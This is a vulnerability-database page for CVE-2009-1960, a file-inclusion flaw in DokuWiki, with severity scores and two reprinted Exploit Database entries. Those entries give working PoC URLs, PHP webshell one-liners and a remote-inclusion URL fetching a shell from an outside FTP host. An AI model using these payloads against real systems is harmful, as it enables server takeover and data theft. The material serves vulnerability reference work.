CVE-2009-1960
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 8781
Publication date : 2009-05-25 22h00 +00:00
Author : girex
EDB Verified : Yes
# Author_ girex
# Homepage_ girex.altervista.org
# CMS_ Dokuwiki
# Homepage_ dokuwiki.org
# Affected versions_ 2009-02-14
rc2009-02-06
rc2009-01-30
# Bug_ Local file inclusion
# Need_ register_globals = On
# Vuln description_
# File: /inc/init.php
// if available load a preload config file
$preload = fullpath(dirname(__FILE__)).'/preload.php';
if (@file_exists($preload)) include($preload);
...
//set the configuration cascade - but only if its not already been set in preload.php
global $config_cascade;
if (empty($config_cascade)) {
$config_cascade = array(
'main' => array(
'default' => array(DOKU_CONF.'dokuwiki.php'),
'local' => array(DOKU_CONF.'local.php'),
'protected' => array(DOKU_CONF.'local.protected.php'),
),
...
// load the global config file(s)
foreach (array('default','local','protected') as $config_group) {
if (empty($config_cascade['main'][$config_group])) continue;
foreach ($config_cascade['main'][$config_group] as $config_file) {
if (@file_exists($config_file)) {
include($config_file);
}
}
}
# File preload.php doesn't exists. (so seems for the affected versions)
# So we can set $config_cascade arrays via register globals
# It's not a RFI couse use of file_exists function.
# First of all you can check the dokuwiki's version here:
# /[host]/[path]/VERSION
# and check if it's a vulnerable version
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=/etc/passwd
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./README
# Note:
# You can obtain a remote command execution if you can edit the content of a page
# Just insert your php code into it like: <?php system($_GET[cmd]); ?>
# And include it:
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/pages/[page_edited].txt
# Or you can check if you have permissions to upload file via:
# [host]/[path]/lib/exe/mediamanager.php
# If so, upload your file with .doc extension then include it:
# PoC: [host]/[path]/doku.php?config_cascade[main][default][]=./data/media/[uploaded_file].doc
# milw0rm.com [2009-05-26]
Exploit Database EDB-ID : 8812
Publication date : 2009-05-25 22h00 +00:00
Author : Nine:Situations:Group
EDB Verified : Yes
Dokuwiki 2009-02-14 Remote/Temporary File Inclusion exploit
tested and working
I was reading: http://www.milw0rm.com/exploits/8781
by girex
[quote]
It's not a RFI couse use of file_exists function.
[/quote]
How wrong brother!
trick 1 (ftp:// wrapper with php 5):
needs register_globals = on
allow_url_fopen = On (default)
allow_url_include = On (not default)
http://[host]/dokuwiki-2009-02-14/doku.php?config_cascade[main][default][]=ftp://anonymous:anon@1.12.123.123/folder/sh.php&cmd=ls%20-la>out.txt
trick 2:
needs register_globals = on
file_uploads = On (default)
include a temporary file passed by the $_FILES[] array:
<form action="http://[host]/dokuwiki-2009-02-14/doku.php?cmd=ls%20-la" method="post" enctype="multipart/form-data" target="_self">
<input name="config_cascade[main][default][]" type="file">
<input type="submit" value="submit">
</form>
where your shell is like:
<?php passthru($_GET[cmd]); die();?>
because when there is no prefix or suffix for the affected var, it remains like this:
/path_to_temporary_folder/php93.tmp !
Nine:Situations:Group::pyrokinesis
site: http://retrogod.altervista.org/
# milw0rm.com [2009-05-26]
Products Mentioned
Configuraton 0
Dokuwiki>>Dokuwiki >> Version 2009-02-14
- Dokuwiki>>Dokuwiki >> Version 2009-02-14 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version rc2009-01-30
- Dokuwiki>>Dokuwiki >> Version rc2009-01-30 (Open CPE detail)
Dokuwiki>>Dokuwiki >> Version rc2009-02-06
- Dokuwiki>>Dokuwiki >> Version rc2009-02-06 (Open CPE detail)
